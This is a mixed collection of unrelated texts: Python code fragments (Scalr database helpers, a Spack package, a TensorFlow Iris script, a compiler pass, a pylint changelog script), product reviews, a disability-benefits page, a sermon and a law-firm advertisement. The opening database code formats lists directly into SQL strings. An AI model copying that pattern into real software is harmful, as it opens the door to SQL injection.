        ).format(str(names)[1:-1], str(servers_id)[1:-1])
        results = self.execute(query)
        tmp = dict()
        for result in results:
            tmp.setdefault(result['server_id'], {}).update({result['name']: result['value']})
        for server in servers:
            if server['server_id'] not in tmp:
                continue
            # Bug fix: dict.iteritems() is Python-2-only; items() works on both.
            for k, v in tmp[server['server_id']].items():
                if k in server and server[k]:
                    continue
                server[k] = v
        return
    def load_client_environment_properties(self, envs, names):
        """Load the given property *names* for *envs* from
        client_environment_properties and merge them in place."""
        names = list(names)
        envs_ids = list(set(env['id'] for env in envs if env['id'] or env['id'] == 0))
        if not envs_ids:
            return tuple()
        # .replace('L', '') strips Python 2 long-literal suffixes from the ids.
        query = (
            "SELECT env_id, name, value "
            "FROM client_environment_properties "
            "WHERE name IN ({0}) "
            "AND env_id IN ({1})"
        ).format(str(names)[1:-1], str(envs_ids).replace('L', '')[1:-1])
        results = self.execute(query)
        tmp = dict()
        for result in results:
            tmp.setdefault(result['env_id'], {}).update({result['name']: result['value']})
        for env in envs:
            if env['id'] not in tmp:
                continue
            # Bug fix: dict.iteritems() is Python-2-only; items() works on both.
            for k, v in tmp[env['id']].items():
                if k in env and env[k]:
                    continue
                env[k] = v
        return
    def load_farm_settings(self, farms, names):
        """Load the given setting *names* for *farms* from farm_settings and
        merge them into each farm dict in place."""
        names = list(names)
        farms_ids = list(set(farm['id'] for farm in farms if farm['id'] or farm['id'] == 0))
        if not farms_ids:
            return dict()
        query = (
            "SELECT farmid farm_id, name, value "
            "FROM farm_settings "
            "WHERE name IN({0}) "
            "AND farmid IN ({1})"
        ).format(str(names)[1:-1], str(farms_ids).replace('L', '')[1:-1])
        results = self.execute(query)
        tmp = dict()
        for result in results:
            tmp.setdefault(result['farm_id'], {}).update({result['name']: result['value']})
        for farm in farms:
            if farm['id'] not in tmp:
                continue
            # Bug fix: dict.iteritems() is Python-2-only; items() works on both.
            for k, v in tmp[farm['id']].items():
                if k in farm and farm[k]:
                    continue
                farm[k] = v
        return
    def load_farm_role_settings(self, farms_roles, names):
        """Load the given setting *names* for *farms_roles* from
        farm_role_settings and merge them in place."""
        names = list(names)
        farms_roles_ids = list(set(_['id'] for _ in farms_roles if _['id'] or _['id'] == 0))
        if not farms_roles_ids:
            return dict()
        query = (
            "SELECT farm_roleid, name, value "
            "FROM farm_role_settings "
            "WHERE name IN ({0}) "
            "AND farm_roleid IN ({1})"
        ).format(str(names)[1:-1], str(farms_roles_ids).replace('L', '')[1:-1])
        results = self.execute(query)
        tmp = dict()
        for result in results:
            tmp.setdefault(result['farm_roleid'], {}).update({result['name']: result['value']})
        for farm_role in farms_roles:
            if farm_role['id'] not in tmp:
                continue
            # Bug fix: dict.iteritems() is Python-2-only; items() works on both.
            for k, v in tmp[farm_role['id']].items():
                if k in farm_role and farm_role[k]:
                    continue
                farm_role[k] = v
        return
    def load_vpc_settings(self, servers):
        """Annotate *servers* in place with VPC-related settings:
        'ec2.vpc.id', 'router_role_id' and 'router.vpc.ip'."""
        # ec2.vpc.id
        farms_id = list(set([_['farm_id'] for _ in servers if _['farm_id'] or _['farm_id'] == 0]))
        if not farms_id:
            return
        query = (
            "SELECT farmid, value "
            "FROM farm_settings "
            "WHERE name = 'ec2.vpc.id' "
            "AND farmid IN ({0})"
        ).format(str(farms_id).replace('L', '')[1:-1])
        results = self.execute(query)
        tmp = dict()
        for result in results:
            tmp[result['farmid']] = result['value']
        for server in servers:
            if server['farm_id'] not in tmp:
                continue
            server['ec2.vpc.id'] = tmp[server['farm_id']]
        # router_role_id
        farms_role_id = list(set([_['farm_roleid'] for _ in servers if 'ec2.vpc.id' in _]))
        if not farms_role_id:
            return
        # get router role id from farm_role_settings
        query = (
            "SELECT farm_roleid, value "
            "FROM farm_role_settings "
            "WHERE name = 'router.scalr.farm_role_id' "
            "AND farm_roleid IN ({0}) "
        ).format(str(farms_role_id).replace('L', '')[1:-1])
        results = self.execute(query)
        tmp = dict()
        for result in results:
            tmp[result['farm_roleid']] = int(result['value'])
        for server in servers:
            if server['farm_roleid'] not in tmp:
                continue
            # router.scalr.farm_role_id has int type
            server['router_role_id'] = int(tmp[server['farm_roleid']])
        # get router role id from farm_roles
        query = (
            "SELECT id router_role_id, farmid "
            "FROM farm_roles "
            "WHERE role_id IN "
            "(SELECT role_id FROM role_behaviors WHERE behavior='router') "
            "AND farmid IN ({0})"
        ).format(str(farms_id).replace('L', '')[1:-1])
        results = self.execute(query)
        tmp = dict()
        for result in results:
            tmp[result['farmid']] = result['router_role_id']
        for server in servers:
            if 'router_role_id' not in server and server['farm_id'] in tmp:
                server['router_role_id'] = tmp[server['farm_id']]
        # router_vpc_ip
        routers_role_id = list(set(_['router_role_id']
                               for _ in servers if 'ec2.vpc.id' in _ and 'router_role_id' in _))
        if not routers_role_id:
            return
        query = (
            "SELECT farm_roleid, value "
            "FROM farm_role_settings "
            "WHERE name = 'router.vpc.ip' "
            "AND farm_roleid IN ({0})"
        ).format(str(routers_role_id).replace('L', '')[1:-1])
        results = self.execute(query)
        tmp = dict()
        for result in results:
            tmp[result['farm_roleid']] = result['value']
        for server in servers:
            if 'router_role_id' in server and server['router_role_id'] in tmp:
                server['router.vpc.ip'] = tmp[server['router_role_id']]
        return
|
The perfect balance of slim and slouchy. Our Sienna Slim Boyfriend is reflective of the tapered boyfriend fit you love, featuring classic 5-pocket styling, a button fly closure and a destroyed front in a bold fiery hue. Size up for extra chill points, or size down for fitted ease.
The color is so great! The waist was a bit big but can use a belt to cover up.
Fabric is harder than most Lucky jeans I've ever had. And the size runs small.
Not your usual jeans , they stand out and are so comfy!!
Love these pants! Great color and perfect fit!
Definitely order a size smaller than your normal size. I read other reviews suggesting that and am glad I listened. These are boxy stiff looking jeans but cute because of the color. Good quality and I disagree with negative comments about the stability of the fabric because of the holes. They will surely hold up to multiple washings and maybe get better and softer with age.
Love the color and fit of these jeans. Perfect fit. Can be dressed up or casual.
I can't wait to wear these sassy jeans on my vacation!
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
from spack import *
class Diffutils(AutotoolsPackage, GNUMirrorPackage):
    """GNU Diffutils is a package of several programs related to finding
    differences between files."""
    # Binary name used by Spack's external-package detection.
    executables = [r'^diff$']
    homepage = "https://www.gnu.org/software/diffutils/"
    gnu_mirror_path = "diffutils/diffutils-3.7.tar.xz"
    version('3.7', sha256='b3a7a6221c3dc916085f0d205abf6b8e1ba443d4dd965118da364a1dc1cb3a26')
    version('3.6', sha256='d621e8bdd4b573918c8145f7ae61817d1be9deb4c8d2328a65cea8e11d783bd6')
    # Build out of the source tree in a dedicated directory.
    build_directory = 'spack-build'
    # Patch needed to build 3.7 with the NVIDIA HPC compilers.
    patch('nvhpc.patch', when='@3.7 %nvhpc')
    depends_on('iconv')
    def setup_build_environment(self, env):
        # NOTE(review): '-Qunused-arguments' is applied for the Fujitsu ('%fj')
        # compiler -- confirm this flag is intended for %fj.
        if self.spec.satisfies('%fj'):
            env.append_flags('CFLAGS',
                             '-Qunused-arguments')
    @classmethod
    def determine_version(cls, exe):
        """Parse `diff --version` output to detect an external install's version."""
        output = Executable(exe)('--version', output=str, error=str)
        match = re.search(r'diff \(GNU diffutils\) (\S+)', output)
        return match.group(1) if match else None
|
Assures that more Americans with disabilities have the opportunity to participate in the workforce and lessen their dependence on public benefits.
The Ticket Program is free and voluntary and will offer Social Security beneficiaries with disabilities/blindness a greater choice in obtaining the services they need to help them go to work.
Where would I take my Ticket to Work to receive services?
You should take your Ticket to an employment network. An employment network is a private organization or public agency, including the state vocational rehabilitation agency, which has agreed to work with Social Security to provide services under the Ticket to Work program.
You may contact Maximus, the Operations Support Manager at the toll-free numbers below for information about employment networks that serve the area where you live. You may also find this information on their website at https://choosework.ssa.gov/.
Also, some employment networks may contact you to offer their services. You can get information from MAXIMUS by calling them at their toll-free numbers, 1-866-968-7842 (1-866-yourticket) or 1-866-833-2967 TTY (1-866-TDD2work).
Work Incentives are disability program rules that allow you to reduce your countable income so that you can continue to receive a cash benefit while you explore work or look for a job that is right for you. Examples of such Work Incentives include the extension of Medicare and Medicaid coverage while working, Impairment-Related Work Expenses, and Plans for Achieving Self-Support. In addition, if your work attempt is unsuccessful, SSA has made it easy for you to get back on benefits when and if needed.
View our “Determine Work Incentives” tab for more information about Work Incentives!
Going to work seems complicated. Is there someone who can help me understand the disability program rules and Work Incentives?
Plan to Work Community Work Incentive Coordinators provide information and planning services about work and Work Incentives to individuals 14 to full retirement age who are eligible for SSDI and/or SSI benefits. They can answer questions about how part-time, full-time, or seasonal work would affect your benefits.
Plan to Work can also discuss your individual employment goals, assist you in identifying possible barriers to reaching those goals, and help you find the resources or services to overcome those barriers. Services are FREE, and available in all counties in Washington State, except Pacific, Lewis, Wahkiakum, Cowlitz, Clark, Skamania, Klickitat, Benton, Franklin, and Walla Walla Counties. Call Plan to Work at (866) 497-9443 or the Ticket to Work Helpline at (866) 968-7842 for more information.
Yes. There is a program called Protection and Advocacy for Beneficiaries of Social Security (PABSS). Protection and Advocacy (P&A) systems are publicly funded entities that provide protection and advocacy services free of charge to individuals with disabilities. SSA provides funding to the P&As to implement the PABSS program. PABSS staff assist people receiving Social Security disability benefits with disabilities in obtaining information and advice about receiving vocational rehabilitation and employment services.
P&As provide advocacy and other related services that people receiving Social Security disability benefits with disabilities may need to secure or regain gainful employment. Many P&As administer the Client Assistance Program (CAP) that assists individuals with disabilities in securing services from State VR agencies.
Disability Rights Washington is the PABSS in Washington State. Visit their website for more details about who they are and what they do!
|
import tensorflow as tf
import numpy as np
import struct
import math
import os
# Directory containing this script (not referenced below -- TODO confirm needed).
path=os.path.dirname(os.path.realpath(__file__))
def normalize(v):
    """Return v scaled to unit Euclidean norm; zero vectors are returned unchanged."""
    length = np.linalg.norm(v)
    return v if length == 0 else v / length
def readToLines(file):
    """Read *file* and return a list of rows, each row being the comma-split
    fields of one line.

    Fix: the file is now opened via ``with`` so it is closed even if reading
    raises (the previous explicit close() was skipped on error).
    """
    with open(file) as csvFile:
        lines = csvFile.read().splitlines()
    return [line.split(',') for line in lines]
# Dataset and model hyper-parameters for the Iris classifier below.
FEATURES=4  # number of input features per example
NUM_CLASSES=3  # number of output classes (Iris species)
hidden1_num_neurons=2 #neurons in first (hidden) layer
output_num_neurons=NUM_CLASSES #neurons in second (output) layer; one per class. The classification is the index of the
#output neuron with the highest activation
def loadData(file):
    """Read the Iris CSV and return (train_x, train_y, val_x, val_y) with a 75/25 split.

    Assumes the first line of the file is a header row (hence the len-1 array
    sizing) and that column 4 holds an integer class label in
    [0, NUM_CLASSES) -- TODO confirm against the actual data file.

    Fixes: the old ``vocab = list(set(splitLines))`` raised TypeError (rows are
    unhashable lists) and the loop iterated one row past the allocated arrays.
    """
    splitLines = readToLines(file)
    num_examples = len(splitLines) - 1  # first line is the CSV header
    features = np.zeros([num_examples, FEATURES])
    labels = np.zeros([num_examples, NUM_CLASSES])
    # Skip the header row; data row i maps to example i-1.
    for dataInd in range(1, len(splitLines)):
        splitLine = splitLines[dataInd]
        features[dataInd - 1, :] = splitLine[:4]
        labels[dataInd - 1, int(splitLine[4])] = 1.0
    # Scale each feature column to unit norm.
    for ind in range(0, len(features[0])):
        features[:, ind] = normalize(features[:, ind])
    split = int(3 * num_examples / 4)
    return features[:split], labels[:split], features[split:], labels[split:]
def getClassificationAccuracy(networkOutputs, trueLabels):
    """Print the percentage of examples whose argmax prediction hits a true label."""
    numberCorrect = 0.0
    for idx in range(len(trueLabels)):
        predicted = np.argmax(networkOutputs[idx], 0)
        if trueLabels[idx][predicted] == 1:
            numberCorrect += 1
    print('Classification Accuracy: '+str(100*(numberCorrect/len(trueLabels)))+'%')
# Build and train a small two-layer feed-forward network on the Iris data.
# Fixes: the accumulated-output buffer was hard-coded 10 columns wide (MNIST
# leftover) which cannot receive NUM_CLASSES-wide batches, shuffled batch
# outputs were stored at unshuffled positions (misaligning them with the
# labels passed to getClassificationAccuracy), and the banner named MNIST.
print('Training a neural network on the Iris Classification Problem')
inputs = tf.placeholder(tf.float32, ([None, FEATURES]))  # input features placeholder
trueOutput = tf.placeholder(tf.float32, ([None, NUM_CLASSES]))  # one-hot label placeholder
#first layer weights and biases
weights1 = tf.Variable(tf.random_normal([FEATURES, hidden1_num_neurons]))
biases1 = tf.Variable(tf.zeros([hidden1_num_neurons]))
hidden1 = tf.nn.sigmoid(tf.matmul(inputs, weights1) + biases1)
#second layer weights and biases
weights2 = tf.Variable(tf.random_normal([hidden1_num_neurons, output_num_neurons]))
biases2 = tf.Variable(tf.zeros([output_num_neurons]))
output = tf.nn.softmax(tf.matmul(hidden1, weights2) + biases2)
#loss function: mean squared error
loss=tf.reduce_mean(tf.square(tf.subtract(output, trueOutput)))
#specify optimization operation ('train op')
optimizer = tf.train.AdamOptimizer()
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.minimize(loss, global_step=global_step)
# read the Iris features and one-hot labels (75%/25% train/validation split)
trainImages, trainLabels, valImages, valLabels=loadData('./data/Iris.csv')
#train neural network
BATCH_SIZE=2500
with tf.Session() as session:
    tf.initialize_all_variables().run()
    # train for 40 epochs over the shuffled training set
    for i in range(0, 40):
        shuffle=np.random.permutation(len(trainImages))
        sessLoss=0.0
        # Fix: buffer must be NUM_CLASSES wide (was hard-coded 10).
        sessOutput=np.zeros([len(trainImages), NUM_CLASSES])
        for batchInd in range(0, len(trainImages), BATCH_SIZE):
            _, batchLoss, batchOutput=session.run([train_op, loss, output], feed_dict={inputs: trainImages[shuffle[batchInd:batchInd+BATCH_SIZE]],
                        trueOutput: trainLabels[shuffle[batchInd:batchInd+BATCH_SIZE]]})
            sessLoss+=batchLoss
            # Fix: store outputs at their original (unshuffled) positions so
            # they line up with trainLabels in the accuracy computation below.
            sessOutput[shuffle[batchInd:batchInd+BATCH_SIZE]]=batchOutput
        print('Epoch '+str(i)+' train loss', sessLoss)
        getClassificationAccuracy(sessOutput, trainLabels)
        print()
    sessLoss, sessOutput=session.run([loss, output], feed_dict={inputs: valImages, trueOutput: valLabels})
    print('test loss', sessLoss)
    getClassificationAccuracy(sessOutput, valLabels)
|
American nature TV channel Animal Planet has been rebranded with a blue elephant logo, in a bid to create a “strong, distinctive and joyful mark” that also pays homage to the history of the brand.
The rebrand has been completed by New York-based design consultancy Chermayeff & Geismar & Haviv and was revealed by studio partner Sagi Haviv at the Adobe Max conference in Los Angeles on 15 October.
Animal Planet is a paid-for channel that was first aired 22 years ago in 1996 and is owned by American media company Discovery. It shows a range of educational and reality nature programmes and is available to watch throughout the US and 70 other countries across the world, including Canada, India and Japan.
The new logo features a minimal, blue silhouette of an elephant, which appears “almost as a swoosh”, Haviv tells Design Week, with the channel name set in a black, bold sans-serif typeface underneath, all in lowercase.
Although the main application of the logo is blue, it also appears in white and black depending on what imagery, text or communications it is used against. The logotype also changes colour.
The logo is a reinterpretation of a former, more complex logo held by Animal Planet, which featured an elephant cut-out alongside a more realistic image of a globe, with the logotype set underneath these two icons. The primary colour palette was green and white.
Speaking at the Adobe Max conference, Haviv says that Animal Planet had originally asked the design studio to avoid the colour blue and the elephant icon, due to them being common identifiers of environmental charities and channels – but were convinced when the studio was able to evoke a “feeling” in them with its graphic interpretation.
“We ended up with a blue elephant!” he says. “We showed them options and when they saw this one, it captured a feeling for them. Often, we say that a logo can have an attitude, but an emotion is very difficult [to get from] a simple mark.
“[Animal Planet] needed an icon that was strong, bold and distinctive. But how do you do that and still have an energy or joy about it?
The new branding is intended to work across all of Animal Planet’s brand touchpoints, including merchandise and signage at events, as it has extended from being “not only a [TV] channel” to a “whole lifestyle brand” in recent years, says Haviv.
The new Animal Planet branding is currently rolling out across print and digital advertising and marketing materials such as posters, merchandise such as clothing and rucksacks, interiors and signage at events, online platforms, and broadcast.
Good job, I always enjoyed the playfulness of the previous mark so I’m glad to see that carried forward. Is it just me or can anyone else see some kind of whale riding a wave? I wonder if that was intentional and in that case, it’d represent creatures on both land and sea.
|
import argparse
import codecs
import logging
from pyhocon import ConfigFactory
from deep_qa.common.checks import ensure_pythonhashseed_set
from deep_qa.data.instances.instance import TextInstance
from deep_qa.models.memory_networks.differentiable_search import DifferentiableSearchMemoryNetwork
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def main():
    """
    Load a DifferentiableSearchMemoryNetwork model, encode a corpus and the
    sentences in a given file, and find nearest neighbors in the corpus for
    all of the sentences in the file, using the trained sentence encoder.

    Output format: each input sentence is echoed on its own line, followed by
    one tab-indented line per nearest neighbor, then a blank separator line.
    """
    argparser = argparse.ArgumentParser(description="Neural Network Solver")
    argparser.add_argument('--param_file', type=str, required=True,
                           help='Path to file containing solver parameters')
    argparser.add_argument('--sentence_file', type=str, required=True,
                           help='Path to sentence file, for which we will find nearest neighbors')
    argparser.add_argument('--output_file', type=str, required=True,
                           help='Place to save results of nearest neighbor search')
    args = argparser.parse_args()

    params = ConfigFactory.parse_file(args.param_file)
    solver = DifferentiableSearchMemoryNetwork(**params)  # TODO(matt): fix this in the next PR
    solver.load_model()

    # BUG FIX: the sentence file was previously opened without ever being
    # closed; both handles are now managed by context managers.
    with codecs.open(args.output_file, 'w', 'utf-8') as outfile, \
            codecs.open(args.sentence_file, 'r', 'utf-8') as sentence_file:
        for line in sentence_file:
            outfile.write(line)
            instance = TextInstance(line.strip(), True)
            neighbors = solver.get_nearest_neighbors(instance)
            for neighbor in neighbors:
                outfile.write('\t')
                outfile.write(neighbor.text)
                outfile.write('\n')
            outfile.write('\n')
if __name__ == "__main__":
    # Fails fast unless PYTHONHASHSEED is fixed (presumably for reproducible
    # encodings) -- see deep_qa.common.checks.
    ensure_pythonhashseed_set()
    logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
                        level=logging.INFO)
    main()
|
What causes you to believe? I like watching the old Perry Mason episodes on TV. Perry is a defense lawyer, and he is always going to court for a client that everyone believes is guilty. The hour of the show works like this: the show begins with one person saying to another, "I wish you were dead." The second person invariably ends up murdered and the police collect evidence that makes it pretty easy for the DA, Mr. Burger, to prove that Perry's client did indeed murder the person that they had wished dead. For some reason, though, Perry believes in his client and has the patience to follow a faint trail of bread crumbs until it leads him to the real murderer. In the last fifteen minutes of the show, Perry leads the court through a series of witnesses that prove his client couldn't have done it. The guilty party is then forced into a confession. After the commercial, Perry's secretary always asks him how he believed in the client when no one else did. Perry smiles and shakes his head, as if it would be so logical if they had believed in his client from the beginning like he did.
Is faith in Jesus like that? Note that in every Perry Mason episode we, the viewers, find ourselves first believing one thing, then brought to doubt, then brought to believe in something else. This happens relatively rarely in real life. We are all victims of something called confirmation bias. We decide, sometimes on the basis of very little evidence, that something is true. We might use a particular brand of soap, because we believe it works better than another. Even with a side by side test, or an article in Consumer Reports that rates our product last, we remain true believers. We might be in a problematic relationship. They might be abusive. Still, because of this thing that psychologists call confirmation bias, we stick with them. On the other hand, our neighbor might be a good and decent person, yet because of prejudice or a false rumor that we accepted, we might not trust them.
John begins his gospel with a series of seven little miracle stories. John assumes that his reader doesn't believe in Jesus. He has an uphill task, as he writes, for most people in his day and in ours, have a confirmation bias against really believing in Jesus. Oh, most people think Jesus was a great man and had something to do with religion. But few today really see Jesus as the son of the true God sent to earth to save us. John, though, remembers when he overcame his own bias against Jesus. John remembers standing there watching water being taken from a jar and as it is offered to the host of the wedding party, it becomes wine. This is the moment when John's confirmation bias is overcome.
For the rest of his gospel John is like Perry Mason. He calls forth his witnesses one by one. The wedding of Cana is the first of seven episodes. In it a few people really see what is happening. Everyone drinks the wine and wonders where it came from. Everyone has a good time. But only John and a few others see both the miracle and the meaning of it. If Jesus makes new wine and offers it abundantly for all, then the era of God's grace must be beginning. The good news is that our dull lives can be changed, just as this wash water can become the finest wine.
All of this is hidden in the first miracle. Not everyone can be Perry Mason and believe from the beginning. But we all can change. There is not a single person who can't give up their prejudice and worldliness and become a believer in Jesus Christ. The last of the seven miracles involves a man who has been dead for four days. Even Jesus' disciples don't believe that he can do anything for the man named Lazarus. John tells us how Jesus had the tombstone rolled away and Lazarus called back into the living. Seeing this, many come to faith. But as we live our lives, we have to deal with our faith and our doubts with such subtle evidence. Like Perry Mason, we need wisdom to accept the truth early, but also, to be willing to dismiss the falsehoods and prejudices that can cause us to make bad decisions.
|
import json
from django.contrib.auth.models import User
from django.test.client import Client
from django.core.urlresolvers import reverse
from rest_framework.authtoken.models import Token
from api_users.models import ApiUser
def generate_api_user(username='user', email='test@test.com', password='password', login=True):
    """Generate an app user for tests, optionally logging in for a token.

    Args:
        username: username for the new Django user
        email: email address for the new Django user
        password: password to set on the user and to log in with
        login: if set to True, a login query is made

    Returns:
        (user, token, header); ``token`` and ``header`` are None when
        ``login`` is False.
    """
    token = None
    header = None
    user = User.objects.create(
        username=username, email=email, is_active=True)
    ApiUser.objects.create(user=user)
    # BUG FIX: the hard-coded string 'password' used to be set here regardless
    # of the ``password`` argument; honour the caller's parameters instead.
    user.set_password(password)
    user.save()
    if login is True:
        c = Client()
        # BUG FIX: the login payload also ignored the ``email``/``password``
        # arguments and always sent the defaults.
        data = {
            'email': email,
            'password': password,
        }
        json_data = json.dumps(data)
        res = c.post(reverse('api_login'),
                     json_data, content_type='application/json')
        data = json.loads(res.content)
        token = Token.objects.get(user=user).key
        header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token)}
    return user, token, header
|
Erb’s Palsy Caused by Medical Malpractice. Erb’s Palsy is a disorder that is often caused by an injury to an infant during birth. Many cases of Erb’s Palsy are the result of an error made by a medical practitioner, such as the delivering physician. Medical malpractice occurs when a medical practitioner causes an injury to a patient by doing something that failed to meet the standard of care for professionals in their field. In these cases, injured patients have the right to seek compensation for their injuries. It is essential for families impacted by Erb’s Palsy to contact an experienced attorney to determine if they have a claim for medical malpractice against the delivering physician.
Infants that suffer from Erb’s Palsy will typically exhibit weakness or sometimes even full paralysis in their arm. The impairment can impact the upper arm or extend to the lower arm and sometimes to the hand. In some cases, the infant’s eyelid on the opposite side of the affected arm will droop. Infants with Erb’s Palsy may not exhibit the Moro reflex (which is a healthy reaction in babies when they are startled) on the impacted side.
Erb’s Palsy is the result of damage to the nerves near the brachial plexus. This group of nerves is responsible for movement and feeling in the arm, hand, and fingers. Sometimes during a difficult delivery, a baby can suffer damage to the brachial nerves. This can occur if the baby’s neck is pulled too far to one side, if the shoulders are pulled on too hard, or when the arms are under too much pressure, which often occurs in breech birth. The risk of these complications increases with an overly large baby, because the shoulders are more likely to be caught on the mother’s pelvic bones, causing a complication referred to as shoulder dystocia. Women with gestational diabetes and short women have a higher risk of these problems during birth. The use of forceps and vacuum extractors also creates a larger risk of Erb’s Palsy.
A doctor can be responsible for Erb’s palsy. Improper use of vacuums or forceps, and pulling too hard can all cause the condition. Sometimes a physician might not have monitored the fetus’ size, leading to a baby being delivered vaginally when a C-section should have been performed to avoid the risks of delivering a very large baby.
In cases where the nerves were stretched, the damage might heal within six months to one year. In more severe cases, scar tissue may form around the nerves causing long-term difficulties with the infant’s use of the arm. There are more serious cases as well, where rather than stretching, the nerves are separated from the spinal cord.
In less severe instances, treatment might include stretches and massage. In other situations, surgery might be required to repair the damaged nerve. In some cases, the patient might receive a nerve transplant.
If your family has been impacted by Erb’s Palsy, it is essential to understand your rights and to determine if you are entitled to compensation as a result of the injuries that were caused. Contact Parker Waichman LLP today at 1-800-YOURLAWYER (1-800-968-7529) for a free consultation with one of our experienced medical malpractice attorneys.
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def sortedArrayToBST(self, nums):
        """
        :type nums: List[int]
        :rtype: TreeNode

        Build a height-balanced BST from a sorted array by recursively using
        the middle element of each index range as the subtree root.
        O(n) time, O(log n) recursion depth; avoids the list slicing of the
        naive recursive version.
        """
        return self.getHelper(nums, 0, len(nums) - 1)

    def getHelper(self, nums, start, end):
        """Build a BST from nums[start:end + 1]; returns None for an empty range."""
        if start > end:
            return None
        # BUG FIX: use floor division so ``mid`` stays an int on Python 3;
        # ``(start + end) / 2`` produces a float there and nums[mid] raises
        # TypeError.
        mid = (start + end) // 2
        node = TreeNode(nums[mid])
        node.left = self.getHelper(nums, start, mid - 1)
        node.right = self.getHelper(nums, mid + 1, end)
        return node
|
Mark Hargin Farm is one of the businesses that passed an inspection from the USDA National Organic Program Accredited Inspection Agency on 09/25/2012. The company is located at 1624 320Th St in Bedford, Iowa 50833. The unique ID number for this operation is 2580001166. OneCert, Inc is the representative authorized to certify the operation. The company provides the following certified products: Other: Corn, Pasture.
|
import logging
from core import *
_log = logging.getLogger(__file__)
def make_dead(insts, idx):
    """Mark the instruction at ``insts[idx]`` as dead.

    An instruction with side effects must be kept, so only its (unused)
    destination is dropped; otherwise the whole instruction is replaced by a
    DEAD placeholder that remembers the original in its comments.
    """
    victim = insts[idx]
    if victim.op == "DEAD":
        # Already eliminated on a previous pass; nothing to do.
        return
    if victim.side_effect():
        # Keep the call/store itself, discard only the unused result.
        victim.dest = None
        return
    placeholder = Inst(None, "DEAD", [])
    placeholder.addr = victim.addr
    placeholder.comments["org_inst"] = victim
    insts[idx] = placeholder
def dead_code_elimination_forward(bblock):
    """Try to perform eliminations using forward flow. This is reverse
    to the natural direction, and requires multiple passing over
    bblock to stabilize. Don't use it, here only for comparison."""
    # NOTE(review): shadows the builtin ``vars``; kept as-is.
    vars = bblock.defs()
    for v in vars:
        # ``last`` is the index of the most recent definition of v that has
        # not yet been seen to be used.
        last = None
        for i, inst in enumerate(bblock.items):
            if v in inst.args:
                # v is read here, so the pending definition is live.
                last = None
            if inst.dest == v:
                if last is not None:
                    # Previous definition was redefined without ever being
                    # read in between -> it is dead.
                    make_dead(bblock.items, last)
                last = i
        node = bblock.cfg[bblock.addr]
        live_out = node.get("live_out")
        if last is not None and live_out is not None:
            # A definition reaching the end of the block is dead only when
            # liveness analysis says v is not live on exit.
            if v not in live_out:
                make_dead(bblock.items, last)
def dead_code_elimination_backward(bblock):
    """Eliminate dead code in ``bblock`` with a single backward pass.

    Walks the instructions from last to first while maintaining the set of
    live variables, marking dead every register definition that is not live
    at that point.

    Returns True if any instruction was changed.
    """
    node = bblock.cfg[bblock.addr]
    live = node.get("live_out")
    if live is None:
        # Without liveness info we must assume every defined variable may be
        # used later, which prevents eliminating end-of-block definitions.
        # BUG FIX: Logger.warn is a deprecated alias of Logger.warning.
        _log.warning("BBlock %s: No live_out set, conservatively assuming all defined vars are live", bblock.addr)
        live = bblock.defs()
    live = live.copy()
    changes = False
    for i in range(len(bblock.items) - 1, -1, -1):
        inst = bblock.items[i]
        if isinstance(inst.dest, REG):
            if inst.dest in live:
                # This definition satisfies the downstream use; above this
                # point the variable is no longer live.
                live.remove(inst.dest)
            else:
                make_dead(bblock.items, i)
                changes = True
        # Re-fetch: make_dead may have replaced the instruction in place.
        inst = bblock.items[i]
        live |= inst.uses()
    return changes


# Backward elimination is the preferred (single-pass) implementation.
dead_code_elimination = dead_code_elimination_backward
|
Find the perfect rug for any room in your home.
Family owned and operated in South Burlington, Vermont for more than 30 years.
Traditional, contemporary and antique rugs from around the world! Our wide selection is the best in Vermont.
Our effective and 100% safe rug cleaning service is unmatched. Bring your old carpet back to life.
|
# ORIGINAL here: https://github.com/PyCQA/astroid/blob/main/script/bump_changelog.py
# DO NOT MODIFY DIRECTLY
"""
This script permits to upgrade the changelog in astroid or pylint when releasing a version.
"""
# pylint: disable=logging-fstring-interpolation
import argparse
import enum
import logging
from datetime import datetime
from pathlib import Path
from typing import List
# Changelog path is resolved relative to the current working directory.
DEFAULT_CHANGELOG_PATH = Path("ChangeLog")
# Placeholder date line used for not-yet-released sections.
RELEASE_DATE_TEXT = "Release date: TBA"
WHATS_NEW_TEXT = "What's New in Pylint"
TODAY = datetime.now()
# Section heading template, e.g. "What's New in Pylint 2.7.0?"
FULL_WHATS_NEW_TEXT = WHATS_NEW_TEXT + " {version}?"
# Concrete release-date line stamped with today's date.
NEW_RELEASE_DATE_MESSAGE = "Release date: {}".format(TODAY.strftime("%Y-%m-%d"))
def main() -> None:
    """Parse the CLI arguments and rewrite the changelog for the release."""
    parser = argparse.ArgumentParser(__doc__)
    parser.add_argument("version", help="The version we want to release")
    parser.add_argument(
        "-v", "--verbose", action="store_true", default=False, help="Logging or not"
    )
    args = parser.parse_args()
    if args.verbose:
        logging.basicConfig(level=logging.DEBUG)
    logging.debug(f"Launching bump_changelog with args: {args}")
    if "dev" in args.version:
        # Development versions never get a changelog entry.
        return
    with open(DEFAULT_CHANGELOG_PATH) as changelog:
        new_content = transform_content(changelog.read(), args.version)
    with open(DEFAULT_CHANGELOG_PATH, "w") as changelog:
        changelog.write(new_content)
class VersionType(enum.Enum):
    """Which component of a ``major.minor.patch`` version is being bumped.

    The member value doubles as the index of that component in the dotted
    version string, so do not renumber.
    """

    MAJOR = 0
    MINOR = 1
    PATCH = 2


def get_next_version(version: str, version_type: VersionType) -> str:
    """Return *version* with the *version_type* component incremented.

    Components to the right of the bumped one are reset to zero, and any
    pre-release suffix on the bumped component (e.g. ``1-dev0``) is dropped.
    """
    parts = version.split(".")
    bumped = parts[version_type.value]
    if "-" in bumped:
        # Strip a pre-release suffix such as "-dev0" before incrementing.
        bumped = bumped.split("-")[0]
    for index in range(version_type.value, 3):
        parts[index] = "0"
    parts[version_type.value] = str(int(bumped) + 1)
    return ".".join(parts)
def get_next_versions(version: str, version_type: VersionType) -> List[str]:
    """Return the version strings whose changelog sections must exist next."""
    if version_type == VersionType.PATCH:
        # "2.6.1" => ["2.6.2"]
        return [get_next_version(version, VersionType.PATCH)]

    if version_type == VersionType.MINOR:
